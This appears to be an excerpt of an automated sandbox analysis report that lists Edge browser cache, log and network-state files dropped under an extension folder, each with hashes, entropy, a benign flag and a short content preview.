                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.736218952347586E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlEru/:Ls3b
                                                                                                                                                                                                                                                                                                MD5:5AAD7F8D2EC8BCCEA19C24975666C61E
                                                                                                                                                                                                                                                                                                SHA1:8007DAE55513294E7631BEDB90327EAA886DF680
                                                                                                                                                                                                                                                                                                SHA-256:0584EBD99E2C04326851D8F23790BE88D82E9F4A5308D80D5DC67BC645DE7AA4
                                                                                                                                                                                                                                                                                                SHA-512:249261A06B15340810FF5D163074794389DF4B0DD474197FE860E80CA34E237BF00AD914464D97981FD37F648F6B97900C744B833DD3F03E3148D23670F395EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............................................s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.238901308113348
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7QIvYfYebvqBQFUt/Fa/eD5JfYebvqBvJ:7tYfYebvZgHJfYebvk
                                                                                                                                                                                                                                                                                                MD5:D56F6667D658E26A81F70B9660C5776B
                                                                                                                                                                                                                                                                                                SHA1:CE683F045D6F8C0055FB408370A29226FD911F85
                                                                                                                                                                                                                                                                                                SHA-256:70473607EE64448F882D55A045C5F669C0679035ED7BBF584E94955565D0CAFE
                                                                                                                                                                                                                                                                                                SHA-512:5D675FF87E9649841594BDA5FC226CA94C007BC5B8A9CFF7BAD372D65386CFB1DE381FC3B71CD2247AC69052FBAF881694E634355C02CBAD707CF4C5865A0B0E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.897 13c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:43:30.899 13c0 Recovering log #3.2025/03/08-18:43:30.903 13c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.238901308113348
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7QIvYfYebvqBQFUt/Fa/eD5JfYebvqBvJ:7tYfYebvZgHJfYebvk
                                                                                                                                                                                                                                                                                                MD5:D56F6667D658E26A81F70B9660C5776B
                                                                                                                                                                                                                                                                                                SHA1:CE683F045D6F8C0055FB408370A29226FD911F85
                                                                                                                                                                                                                                                                                                SHA-256:70473607EE64448F882D55A045C5F669C0679035ED7BBF584E94955565D0CAFE
                                                                                                                                                                                                                                                                                                SHA-512:5D675FF87E9649841594BDA5FC226CA94C007BC5B8A9CFF7BAD372D65386CFB1DE381FC3B71CD2247AC69052FBAF881694E634355C02CBAD707CF4C5865A0B0E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.897 13c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:43:30.899 13c0 Recovering log #3.2025/03/08-18:43:30.903 13c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\60b2ef7c-8cd1-4136-9b6f-6a9058fa66db.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF34065.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF245b9.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                                SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                                SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                                SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\cc8fbfdb-ab32-4b53-9620-f892ddaae425.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d452efa1-06b3-4c0a-a8af-1e65cf6dd89b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e5061fc5-3ccf-4e5f-a9b4-cf870685daa5.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):417
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.273620727286228
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvgcr+q2Pwkn23oH+TcwtzjqEKj0QMxIFUtdgObZmwrgLNVkwOwkn23oH+TcwtT:7RSvYfYebvqBZFUth/q5JfYebvqBaJ
                                                                                                                                                                                                                                                                                                MD5:FB5AB6874DAEE3B870176E0104BB3DA6
                                                                                                                                                                                                                                                                                                SHA1:FEFA0D199F19A1DAFAB5C7EB7E99094734F4B8E9
                                                                                                                                                                                                                                                                                                SHA-256:460F2B7E64A1F18ECD310645D3A47998229131A1951FA60F04449F60919FC6CC
                                                                                                                                                                                                                                                                                                SHA-512:3248B8DD1E8A898BA2EC0B047C745856463E7C6C3AE16FB0E80C5D1A92CFB74F28777AA21E1CA349A57F6572D87D84579597CA0E67956A3600C3F0B2451F28F4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:48.166 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/08-18:43:48.168 4b8 Recovering log #3.2025/03/08-18:43:48.172 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):417
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.273620727286228
                                                                                                                                                                                                                                                                                                Encrypted:false
